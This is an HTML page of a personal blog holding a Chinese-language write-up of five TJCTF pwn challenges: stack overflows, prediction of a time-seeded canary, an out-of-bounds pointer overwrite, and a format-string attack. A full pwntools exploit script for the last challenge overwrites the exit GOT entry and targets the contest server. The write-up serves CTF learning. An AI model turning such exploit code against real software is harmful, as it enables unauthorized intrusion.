<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">



<title>
  
    tjctf记录
  
</title>

<meta name="description" content="前言看着ctftime上的时间表参加了tjctf的比赛。pwn，re题目非常简单，在今天结束最高到了第二名.(pwn,re做完了，misc太菜)。虽然题目非常简单，类似于国内ISCC，还是简单的做个记录">
<meta name="keywords" content="CTF">
<meta property="og:type" content="article">
<meta property="og:title" content="tjctf记录">
<meta property="og:url" content="http://yoursite.com/2018/08/07/tjctf记录/index.html">
<meta property="og:site_name" content="pwndog&#39;s blog">
<meta property="og:description" content="前言看着ctftime上的时间表参加了tjctf的比赛。pwn，re题目非常简单，在今天结束最高到了第二名.(pwn,re做完了，misc太菜)。虽然题目非常简单，类似于国内ISCC，还是简单的做个记录">
<meta property="og:locale" content="CN">
<meta property="og:image" content="http://yoursite.com/2018/08/07/tjctf记录/1.png">
<meta property="og:image" content="http://yoursite.com/2018/08/07/tjctf记录/2.png">
<meta property="og:image" content="http://yoursite.com/2018/08/07/tjctf记录/3.jpg">
<meta property="og:image" content="http://yoursite.com/2018/08/07/tjctf记录/4.png">
<meta property="og:image" content="http://yoursite.com/2018/08/07/tjctf记录/6.png">
<meta property="og:image" content="http://yoursite.com/2018/08/07/tjctf记录/5.png">
<meta property="og:image" content="http://yoursite.com/2018/08/07/tjctf记录/7.png">
<meta property="og:image" content="http://yoursite.com/2018/08/07/tjctf记录/8.png">
<meta property="og:image" content="http://yoursite.com/2018/08/07/tjctf记录/9.png">
<meta property="og:image" content="http://yoursite.com/2018/08/07/tjctf记录/10.png">
<meta property="og:updated_time" content="2018-08-07T14:50:11.702Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="tjctf记录">
<meta name="twitter:description" content="前言看着ctftime上的时间表参加了tjctf的比赛。pwn，re题目非常简单，在今天结束最高到了第二名.(pwn,re做完了，misc太菜)。虽然题目非常简单，类似于国内ISCC，还是简单的做个记录">
<meta name="twitter:image" content="http://yoursite.com/2018/08/07/tjctf记录/1.png">


  <link rel="alternative" href="/atom.xml" title="pwndog&#39;s blog" type="application/atom+xml">



  <link rel="icon" href="/favicon.png">


<link rel="stylesheet" href="/perfect-scrollbar/css/perfect-scrollbar.min.css">
<link rel="stylesheet" href="/styles/main.css">






</head>
<body
  
    class="monochrome"
  
  >
  <div class="mobile-header">
  <button class="sidebar-toggle" type="button">
    <span class="icon-bar"></span>
    <span class="icon-bar"></span>
    <span class="icon-bar"></span>
  </button>
  <a class="title" href="/">pwndog&#39;s blog</a>
</div>

  <div class="main-container">
    <div class="sidebar">
  <div class="header">
    <h1 class="title"><a href="/">pwndog&#39;s blog</a></h1>
    
    <div class="info">
      <div class="content">
        
        
          <div class="author">zzm</div>
        
      </div>
      
        <div class="avatar">
          
            <a href="/about"><img src="https://cn.gravatar.com/avatar/35fef74d731255cd569c2c2b0b9e87e4?s=200"></a>
          
        </div>
      
    </div>
  </div>
  <div class="body">
    
      
        <ul class="nav">
          
            
              <li class="category-list-container">
                <a href="javascript:;">Category</a>
                <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/glibc源码阅读/">glibc源码阅读</a><span class="category-list-count">1</span></li></ul>
              </li>
            
          
            
              <li class="tag-list-container">
                <a href="javascript:;">Tag</a>
                <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/">--  CTF</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/">-- CTF</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/">CTF</a><span class="tag-list-count">4</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/GLIBC/">GLIBC</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/windows/">windows</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/堆/">堆</a><span class="tag-list-count">1</span></li></ul>
              </li>
            
          
            
              <li class="archive-list-container">
                <a href="javascript:;">Archive</a>
                <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/">2018</a><span class="archive-list-count">9</span></li></ul>
              </li>
            
          
        </ul>
      
        <ul class="nav">
          
            
              <li>
                <a href="/" title="Homepage">Homepage</a>
              </li>
            
          
            
              <li>
                <a href="/archives" title="By Year">By Year</a>
              </li>
            
          
        </ul>
      
        <ul class="nav">
          
            
              <li>
                <a href="https://github.com/denjones/hexo-theme-chan" title="Chan" target="_blank" rel="noopener">Chan</a>
              </li>
            
          
            
              <li>
                <a href="https://github.com/denjones" title="Github" target="_blank" rel="noopener">Github</a>
              </li>
            
          
            
              <li>
                <a href="/atom.xml" title="RSS">RSS</a>
              </li>
            
          
        </ul>
      
    
  </div>
</div>

    <div class="main-content">
      
        <div style="max-width: 1000px">
      
          <article id="post-tjctf记录" class="article article-type-post">
  
    <h1 class="article-header">
      tjctf记录
    </h1>
  
  

  <div class="article-info">
    <span class="article-date">
  2018-08-07
</span>

    

    
	<span class="article-tag tagcloud">
		<ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF/">CTF</a></li></ul>
	</span>


  </div>
  <div class="article-entry">
    <h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>看着ctftime上的时间表参加了tjctf的比赛。pwn，re题目非常简单，在今天结束最高到了第二名.(pwn,re做完了，misc太菜)。虽然题目非常简单，类似于国内ISCC，还是简单的做个记录<br><img src="/2018/08/07/tjctf记录/1.png" alt="第一天排名"><br><a id="more"></a></p>
<h3 id="pwn1"><a href="#pwn1" class="headerlink" title="pwn1"></a>pwn1</h3><p>简单直接的栈溢出，覆盖到之后的变量就可以得到flag，签到<br><img src="/2018/08/07/tjctf记录/2.png" alt=""><br><img src="/2018/08/07/tjctf记录/3.jpg" alt=""></p>
<h3 id="pwn2"><a href="#pwn2" class="headerlink" title="pwn2"></a>pwn2</h3><p>使用srand(time(NULL));通过随机数伪造canary防止栈溢出。<br><img src="/2018/08/07/tjctf记录/4.png" alt=""><br>time（NULL）取到的时间以秒做单位，学到可以通过加载so文件使用time文件得到相同的随机值。<br><img src="/2018/08/07/tjctf记录/6.png" alt=""><br>过了伪造canary直接就可以溢出拿到flag<br><img src="/2018/08/07/tjctf记录/5.png" alt=""></p>
<h3 id="pwn3"><a href="#pwn3" class="headerlink" title="pwn3"></a>pwn3</h3><p><img src="/2018/08/07/tjctf记录/7.png" alt=""><br>题目逻辑就是定义了这么一个结构体，names长度为8，<br>如果strength指针指向位置的最多8个字节的总大小为400可以得到flag。<br>程序存在数组越界，可以输入9次数据，name数组保存的为malloc的地址，堆内容可控。<br>于是输入9次覆盖strength指针，指向的堆又可控，轻松凑出400拿到flag。</p>
<h3 id="pwn4"><a href="#pwn4" class="headerlink" title="pwn4"></a>pwn4</h3><p><img src="/2018/08/07/tjctf记录/8.png" alt=""><br>栈溢出，前面可以向bss段写入33字节，配合栈溢出拿到flag,手动使用x64写了一下shellcode。<br><img src="/2018/08/07/tjctf记录/9.png" alt=""></p>
<h3 id="pwn5"><a href="#pwn5" class="headerlink" title="pwn5"></a>pwn5</h3><p>经典的格式化字符串，本来以为会出一道难一点的。结果是我高估他了。题目给了一个函数直接读取flag，可以通过格式化字符串修改exit got表，同时没有开ASLR。一步搞定，我还以为是改成system拿权限。郁闷直接上代码</p>
<pre><code class="python"><span class="keyword">from</span> pwn <span class="keyword">import</span> *
p=remote(<span class="string">'problem1.tjctf.org'</span>,<span class="number">8008</span>)
context(log_level=<span class="string">'debug'</span>)
elf=ELF(<span class="string">'./libc-2.27.so'</span>)
elfa=ELF(<span class="string">'./8008'</span>)
p.recvuntil(<span class="string">'First, choose a strong password to protect your message:'</span>)
putsGOT1=elfa.got[<span class="string">'exit'</span>]
main=<span class="number">0x08048713</span>

p.sendline(<span class="string">'123'</span>)
p.recvuntil(<span class="string">'&gt;'</span>)
X=main&amp;<span class="number">0x000000ff</span>
X1=(main&amp;<span class="number">0x0000FF00</span>)&gt;&gt;<span class="number">8</span>
X2=(main&amp;<span class="number">0x00ff0000</span>)&gt;&gt;<span class="number">16</span>
X3=(main&amp;<span class="number">0xff000000</span>)&gt;&gt;<span class="number">24</span>
payload=p32(putsGOT1
)+p32(putsGOT1+<span class="number">1</span>)
payload+=<span class="string">"%."</span>+str(X<span class="number">-8</span>)+<span class="string">"x%35$hhn"</span>
payload+=<span class="string">"%."</span>+str((X1-X)&amp;<span class="number">0xff</span>)+<span class="string">"x%36$hhn"</span>
p.sendline(payload)

p.interactive()
</code></pre>
<p><img src="/2018/08/07/tjctf记录/10.png" alt=""></p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>过于简单。但是学习了一下基于时间随机的不可靠性。<br>复习了格式化字符串，主要是自己一直想用system。浪费了不少时间<br>最近更新少，接下来没有比赛开始进行经典cve漏洞的调试过程。</p>

  </div>
  <footer class="article-footer">
    
  <div class="cc">
    <a href="http://creativecommons.org/licenses/by-sa/4.0/deed.C" target="_blank" title="Attribution-ShareAlike">
      <img src="/images/cc/cc.png">
      
          <img src="/images/cc/by.png">
        
          <img src="/images/cc/sa.png">
      
      <span>
        This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.
      </span>
    </a>
  </div>


    

  </footer>
</article>







          <div class="main-footer">
  
    © 2018 pwndog&#39;s blog - Powered by <a href="http://hexo.io" target="_blank">Hexo</a> - Theme <a href="https://github.com/denjones/hexo-theme-chan" target="_blank">Chan</a>
  
</div>

      
        </div>
      
    </div>
  </div>
  <script src="//apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"></script>

  <link rel="stylesheet" href="/PhotoSwipe/photoswipe.css">
  <link rel="stylesheet" href="/PhotoSwipe/default-skin/default-skin.css">

  <!-- Root element of PhotoSwipe. Must have class pswp. -->
  <div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe.
             It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

      <!-- Container that holds slides.
                PhotoSwipe keeps only 3 of them in the DOM to save memory.
                Don't modify these 3 pswp__item elements, data is added later on. -->
      <div class="pswp__container">
        <div class="pswp__item"></div>
        <div class="pswp__item"></div>
        <div class="pswp__item"></div>
      </div>

      <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
      <div class="pswp__ui pswp__ui--hidden">

        <div class="pswp__top-bar">

          <!--  Controls are self-explanatory. Order can be changed. -->

          <div class="pswp__counter"></div>

          <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

          <button class="pswp__button pswp__button--share" title="Share"></button>

          <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

          <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

          <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
          <!-- element will get class pswp__preloader--active when preloader is running -->
          <div class="pswp__preloader">
            <div class="pswp__preloader__icn">
              <div class="pswp__preloader__cut">
                <div class="pswp__preloader__donut"></div>
              </div>
            </div>
          </div>
        </div>

        <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
          <div class="pswp__share-tooltip"></div>
        </div>

        <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)"></button>

        <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)"></button>

        <div class="pswp__caption">
          <div class="pswp__caption__center"></div>
        </div>
      </div>
    </div>
  </div>

  <script src="/PhotoSwipe/photoswipe.js"></script>
  <script src="/PhotoSwipe/photoswipe-ui-default.js"></script>


<script src="/perfect-scrollbar/js/min/perfect-scrollbar.min.js"></script>
<script src="/scripts/main.js"></script>

</body>
</html>
